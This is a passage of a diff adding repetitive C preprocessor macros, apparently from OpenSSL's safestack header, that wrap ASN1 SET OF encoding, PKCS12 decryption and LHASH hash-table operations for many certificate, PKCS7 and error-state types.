+        SKM_ASN1_seq_unpack(ASN1_OBJECT, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_ASN1_TYPE(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(ASN1_TYPE, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_ASN1_TYPE(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(ASN1_TYPE, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_ASN1_TYPE(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(ASN1_TYPE, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_ASN1_TYPE(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(ASN1_TYPE, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_ASN1_UTF8STRING(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(ASN1_UTF8STRING, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_ASN1_UTF8STRING(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(ASN1_UTF8STRING, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_ASN1_UTF8STRING(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(ASN1_UTF8STRING, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_ASN1_UTF8STRING(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(ASN1_UTF8STRING, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_DIST_POINT(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(DIST_POINT, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_DIST_POINT(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(DIST_POINT, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_DIST_POINT(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(DIST_POINT, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_DIST_POINT(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(DIST_POINT, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_ESS_CERT_ID(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(ESS_CERT_ID, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_ESS_CERT_ID(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(ESS_CERT_ID, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_ESS_CERT_ID(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(ESS_CERT_ID, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_ESS_CERT_ID(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(ESS_CERT_ID, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_EVP_MD(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(EVP_MD, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_EVP_MD(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(EVP_MD, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_EVP_MD(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(EVP_MD, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_EVP_MD(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(EVP_MD, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_GENERAL_NAME(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(GENERAL_NAME, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_GENERAL_NAME(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(GENERAL_NAME, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_GENERAL_NAME(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(GENERAL_NAME, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_GENERAL_NAME(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(GENERAL_NAME, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_OCSP_ONEREQ(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(OCSP_ONEREQ, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_OCSP_ONEREQ(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(OCSP_ONEREQ, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_OCSP_ONEREQ(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(OCSP_ONEREQ, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_OCSP_ONEREQ(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(OCSP_ONEREQ, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_OCSP_SINGLERESP(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(OCSP_SINGLERESP, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_OCSP_SINGLERESP(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(OCSP_SINGLERESP, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_OCSP_SINGLERESP(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(OCSP_SINGLERESP, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_OCSP_SINGLERESP(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(OCSP_SINGLERESP, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_PKCS12_SAFEBAG(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(PKCS12_SAFEBAG, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_PKCS12_SAFEBAG(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(PKCS12_SAFEBAG, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_PKCS12_SAFEBAG(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(PKCS12_SAFEBAG, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_PKCS12_SAFEBAG(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(PKCS12_SAFEBAG, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_PKCS7(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(PKCS7, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_PKCS7(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(PKCS7, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_PKCS7(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(PKCS7, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_PKCS7(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(PKCS7, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_PKCS7_RECIP_INFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(PKCS7_RECIP_INFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_PKCS7_RECIP_INFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(PKCS7_RECIP_INFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_PKCS7_RECIP_INFO(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(PKCS7_RECIP_INFO, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_PKCS7_RECIP_INFO(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(PKCS7_RECIP_INFO, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_PKCS7_SIGNER_INFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(PKCS7_SIGNER_INFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_PKCS7_SIGNER_INFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(PKCS7_SIGNER_INFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_PKCS7_SIGNER_INFO(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(PKCS7_SIGNER_INFO, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_PKCS7_SIGNER_INFO(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(PKCS7_SIGNER_INFO, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_POLICYINFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(POLICYINFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_POLICYINFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(POLICYINFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_POLICYINFO(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(POLICYINFO, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_POLICYINFO(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(POLICYINFO, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_POLICYQUALINFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(POLICYQUALINFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_POLICYQUALINFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(POLICYQUALINFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_POLICYQUALINFO(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(POLICYQUALINFO, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_POLICYQUALINFO(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(POLICYQUALINFO, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_SXNETID(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(SXNETID, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_SXNETID(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(SXNETID, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_SXNETID(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(SXNETID, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_SXNETID(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(SXNETID, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_X509(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(X509, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_X509(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(X509, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_X509(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(X509, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_X509(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(X509, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_X509_ALGOR(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(X509_ALGOR, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_X509_ALGOR(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(X509_ALGOR, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_X509_ALGOR(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(X509_ALGOR, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_X509_ALGOR(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(X509_ALGOR, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_X509_ATTRIBUTE(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(X509_ATTRIBUTE, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_X509_ATTRIBUTE(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(X509_ATTRIBUTE, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_X509_ATTRIBUTE(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(X509_ATTRIBUTE, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_X509_ATTRIBUTE(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(X509_ATTRIBUTE, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_X509_CRL(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(X509_CRL, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_X509_CRL(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(X509_CRL, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_X509_CRL(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(X509_CRL, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_X509_CRL(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(X509_CRL, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_X509_EXTENSION(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(X509_EXTENSION, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_X509_EXTENSION(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(X509_EXTENSION, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_X509_EXTENSION(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(X509_EXTENSION, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_X509_EXTENSION(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(X509_EXTENSION, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_X509_NAME_ENTRY(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(X509_NAME_ENTRY, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_X509_NAME_ENTRY(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(X509_NAME_ENTRY, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_X509_NAME_ENTRY(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(X509_NAME_ENTRY, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_X509_NAME_ENTRY(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(X509_NAME_ENTRY, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_X509_REVOKED(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(X509_REVOKED, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_X509_REVOKED(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(X509_REVOKED, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_X509_REVOKED(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(X509_REVOKED, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_X509_REVOKED(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(X509_REVOKED, (buf), (len), (d2i_func), (free_func))
+# define PKCS12_decrypt_d2i_PKCS12_SAFEBAG(algor, d2i_func, free_func, pass, passlen, oct, seq) \
+        SKM_PKCS12_decrypt_d2i(PKCS12_SAFEBAG, (algor), (d2i_func), (free_func), (pass), (passlen), (oct), (seq))
+# define PKCS12_decrypt_d2i_PKCS7(algor, d2i_func, free_func, pass, passlen, oct, seq) \
+        SKM_PKCS12_decrypt_d2i(PKCS7, (algor), (d2i_func), (free_func), (pass), (passlen), (oct), (seq))
+# define lh_ADDED_OBJ_new() LHM_lh_new(ADDED_OBJ,added_obj)
+# define lh_ADDED_OBJ_insert(lh,inst) LHM_lh_insert(ADDED_OBJ,lh,inst)
+# define lh_ADDED_OBJ_retrieve(lh,inst) LHM_lh_retrieve(ADDED_OBJ,lh,inst)
+# define lh_ADDED_OBJ_delete(lh,inst) LHM_lh_delete(ADDED_OBJ,lh,inst)
+# define lh_ADDED_OBJ_doall(lh,fn) LHM_lh_doall(ADDED_OBJ,lh,fn)
+# define lh_ADDED_OBJ_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(ADDED_OBJ,lh,fn,arg_type,arg)
+# define lh_ADDED_OBJ_error(lh) LHM_lh_error(ADDED_OBJ,lh)
+# define lh_ADDED_OBJ_num_items(lh) LHM_lh_num_items(ADDED_OBJ,lh)
+# define lh_ADDED_OBJ_down_load(lh) LHM_lh_down_load(ADDED_OBJ,lh)
+# define lh_ADDED_OBJ_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(ADDED_OBJ,lh,out)
+# define lh_ADDED_OBJ_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(ADDED_OBJ,lh,out)
+# define lh_ADDED_OBJ_stats_bio(lh,out) \
+  LHM_lh_stats_bio(ADDED_OBJ,lh,out)
+# define lh_ADDED_OBJ_free(lh) LHM_lh_free(ADDED_OBJ,lh)
+# define lh_APP_INFO_new() LHM_lh_new(APP_INFO,app_info)
+# define lh_APP_INFO_insert(lh,inst) LHM_lh_insert(APP_INFO,lh,inst)
+# define lh_APP_INFO_retrieve(lh,inst) LHM_lh_retrieve(APP_INFO,lh,inst)
+# define lh_APP_INFO_delete(lh,inst) LHM_lh_delete(APP_INFO,lh,inst)
+# define lh_APP_INFO_doall(lh,fn) LHM_lh_doall(APP_INFO,lh,fn)
+# define lh_APP_INFO_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(APP_INFO,lh,fn,arg_type,arg)
+# define lh_APP_INFO_error(lh) LHM_lh_error(APP_INFO,lh)
+# define lh_APP_INFO_num_items(lh) LHM_lh_num_items(APP_INFO,lh)
+# define lh_APP_INFO_down_load(lh) LHM_lh_down_load(APP_INFO,lh)
+# define lh_APP_INFO_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(APP_INFO,lh,out)
+# define lh_APP_INFO_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(APP_INFO,lh,out)
+# define lh_APP_INFO_stats_bio(lh,out) \
+  LHM_lh_stats_bio(APP_INFO,lh,out)
+# define lh_APP_INFO_free(lh) LHM_lh_free(APP_INFO,lh)
+# define lh_CONF_VALUE_new() LHM_lh_new(CONF_VALUE,conf_value)
+# define lh_CONF_VALUE_insert(lh,inst) LHM_lh_insert(CONF_VALUE,lh,inst)
+# define lh_CONF_VALUE_retrieve(lh,inst) LHM_lh_retrieve(CONF_VALUE,lh,inst)
+# define lh_CONF_VALUE_delete(lh,inst) LHM_lh_delete(CONF_VALUE,lh,inst)
+# define lh_CONF_VALUE_doall(lh,fn) LHM_lh_doall(CONF_VALUE,lh,fn)
+# define lh_CONF_VALUE_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(CONF_VALUE,lh,fn,arg_type,arg)
+# define lh_CONF_VALUE_error(lh) LHM_lh_error(CONF_VALUE,lh)
+# define lh_CONF_VALUE_num_items(lh) LHM_lh_num_items(CONF_VALUE,lh)
+# define lh_CONF_VALUE_down_load(lh) LHM_lh_down_load(CONF_VALUE,lh)
+# define lh_CONF_VALUE_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(CONF_VALUE,lh,out)
+# define lh_CONF_VALUE_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(CONF_VALUE,lh,out)
+# define lh_CONF_VALUE_stats_bio(lh,out) \
+  LHM_lh_stats_bio(CONF_VALUE,lh,out)
+# define lh_CONF_VALUE_free(lh) LHM_lh_free(CONF_VALUE,lh)
+# define lh_ENGINE_PILE_new() LHM_lh_new(ENGINE_PILE,engine_pile)
+# define lh_ENGINE_PILE_insert(lh,inst) LHM_lh_insert(ENGINE_PILE,lh,inst)
+# define lh_ENGINE_PILE_retrieve(lh,inst) LHM_lh_retrieve(ENGINE_PILE,lh,inst)
+# define lh_ENGINE_PILE_delete(lh,inst) LHM_lh_delete(ENGINE_PILE,lh,inst)
+# define lh_ENGINE_PILE_doall(lh,fn) LHM_lh_doall(ENGINE_PILE,lh,fn)
+# define lh_ENGINE_PILE_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(ENGINE_PILE,lh,fn,arg_type,arg)
+# define lh_ENGINE_PILE_error(lh) LHM_lh_error(ENGINE_PILE,lh)
+# define lh_ENGINE_PILE_num_items(lh) LHM_lh_num_items(ENGINE_PILE,lh)
+# define lh_ENGINE_PILE_down_load(lh) LHM_lh_down_load(ENGINE_PILE,lh)
+# define lh_ENGINE_PILE_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(ENGINE_PILE,lh,out)
+# define lh_ENGINE_PILE_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(ENGINE_PILE,lh,out)
+# define lh_ENGINE_PILE_stats_bio(lh,out) \
+  LHM_lh_stats_bio(ENGINE_PILE,lh,out)
+# define lh_ENGINE_PILE_free(lh) LHM_lh_free(ENGINE_PILE,lh)
+# define lh_ERR_STATE_new() LHM_lh_new(ERR_STATE,err_state)
+# define lh_ERR_STATE_insert(lh,inst) LHM_lh_insert(ERR_STATE,lh,inst)
+# define lh_ERR_STATE_retrieve(lh,inst) LHM_lh_retrieve(ERR_STATE,lh,inst)
+# define lh_ERR_STATE_delete(lh,inst) LHM_lh_delete(ERR_STATE,lh,inst)
+# define lh_ERR_STATE_doall(lh,fn) LHM_lh_doall(ERR_STATE,lh,fn)
+# define lh_ERR_STATE_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(ERR_STATE,lh,fn,arg_type,arg)
+# define lh_ERR_STATE_error(lh) LHM_lh_error(ERR_STATE,lh)
+# define lh_ERR_STATE_num_items(lh) LHM_lh_num_items(ERR_STATE,lh)
+# define lh_ERR_STATE_down_load(lh) LHM_lh_down_load(ERR_STATE,lh)
+# define lh_ERR_STATE_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(ERR_STATE,lh,out)
+# define lh_ERR_STATE_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(ERR_STATE,lh,out)
+# define lh_ERR_STATE_stats_bio(lh,out) \
+  LHM_lh_stats_bio(ERR_STATE,lh,out)
+# define lh_ERR_STATE_free(lh) LHM_lh_free(ERR_STATE,lh)
+# define lh_ERR_STRING_DATA_new() LHM_lh_new(ERR_STRING_DATA,err_string_data)
+# define lh_ERR_STRING_DATA_insert(lh,inst) LHM_lh_insert(ERR_STRING_DATA,lh,inst)
+# define lh_ERR_STRING_DATA_retrieve(lh,inst) LHM_lh_retrieve(ERR_STRING_DATA,lh,inst)
+# define lh_ERR_STRING_DATA_delete(lh,inst) LHM_lh_delete(ERR_STRING_DATA,lh,inst)
+# define lh_ERR_STRING_DATA_doall(lh,fn) LHM_lh_doall(ERR_STRING_DATA,lh,fn)
+# define lh_ERR_STRING_DATA_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(ERR_STRING_DATA,lh,fn,arg_type,arg)
+# define lh_ERR_STRING_DATA_error(lh) LHM_lh_error(ERR_STRING_DATA,lh)
+# define lh_ERR_STRING_DATA_num_items(lh) LHM_lh_num_items(ERR_STRING_DATA,lh)
+# define lh_ERR_STRING_DATA_down_load(lh) LHM_lh_down_load(ERR_STRING_DATA,lh)
+# define lh_ERR_STRING_DATA_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(ERR_STRING_DATA,lh,out)
+# define lh_ERR_STRING_DATA_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(ERR_STRING_DATA,lh,out)
+# define lh_ERR_STRING_DATA_stats_bio(lh,out) \
+  LHM_lh_stats_bio(ERR_STRING_DATA,lh,out)
+# define lh_ERR_STRING_DATA_free(lh) LHM_lh_free(ERR_STRING_DATA,lh)
+# define lh_EX_CLASS_ITEM_new() LHM_lh_new(EX_CLASS_ITEM,ex_class_item)
+# define lh_EX_CLASS_ITEM_insert(lh,inst) LHM_lh_insert(EX_CLASS_ITEM,lh,inst)
+# define lh_EX_CLASS_ITEM_retrieve(lh,inst) LHM_lh_retrieve(EX_CLASS_ITEM,lh,inst)
+# define lh_EX_CLASS_ITEM_delete(lh,inst) LHM_lh_delete(EX_CLASS_ITEM,lh,inst)
+# define lh_EX_CLASS_ITEM_doall(lh,fn) LHM_lh_doall(EX_CLASS_ITEM,lh,fn)
+# define lh_EX_CLASS_ITEM_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(EX_CLASS_ITEM,lh,fn,arg_type,arg)
+# define lh_EX_CLASS_ITEM_error(lh) LHM_lh_error(EX_CLASS_ITEM,lh)
+# define lh_EX_CLASS_ITEM_num_items(lh) LHM_lh_num_items(EX_CLASS_ITEM,lh)
+# define lh_EX_CLASS_ITEM_down_load(lh) LHM_lh_down_load(EX_CLASS_ITEM,lh)
+# define lh_EX_CLASS_ITEM_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(EX_CLASS_ITEM,lh,out)
+# define lh_EX_CLASS_ITEM_node_usage_stats_bio(lh,out) \
+  LHM_lh_node_usage_stats_bio(EX_CLASS_ITEM,lh,out)
+# define lh_EX_CLASS_ITEM_stats_bio(lh,out) \
+  LHM_lh_stats_bio(EX_CLASS_ITEM,lh,out)
+# define lh_EX_CLASS_ITEM_free(lh) LHM_lh_free(EX_CLASS_ITEM,lh)
+# define lh_FUNCTION_new() LHM_lh_new(FUNCTION,function)
+# define lh_FUNCTION_insert(lh,inst) LHM_lh_insert(FUNCTION,lh,inst)
+# define lh_FUNCTION_retrieve(lh,inst) LHM_lh_retrieve(FUNCTION,lh,inst)
+# define lh_FUNCTION_delete(lh,inst) LHM_lh_delete(FUNCTION,lh,inst)
+# define lh_FUNCTION_doall(lh,fn) LHM_lh_doall(FUNCTION,lh,fn)
+# define lh_FUNCTION_doall_arg(lh,fn,arg_type,arg) \
+  LHM_lh_doall_arg(FUNCTION,lh,fn,arg_type,arg)
+# define lh_FUNCTION_error(lh) LHM_lh_error(FUNCTION,lh)
+# define lh_FUNCTION_num_items(lh) LHM_lh_num_items(FUNCTION,lh)
+# define lh_FUNCTION_down_load(lh) LHM_lh_down_load(FUNCTION,lh)
+# define lh_FUNCTION_node_stats_bio(lh,out) \
+  LHM_lh_node_stats_bio(FUNCTION,lh,out)
+# define lh_FUNCTION_node_usage_stats_bio(lh,out) \
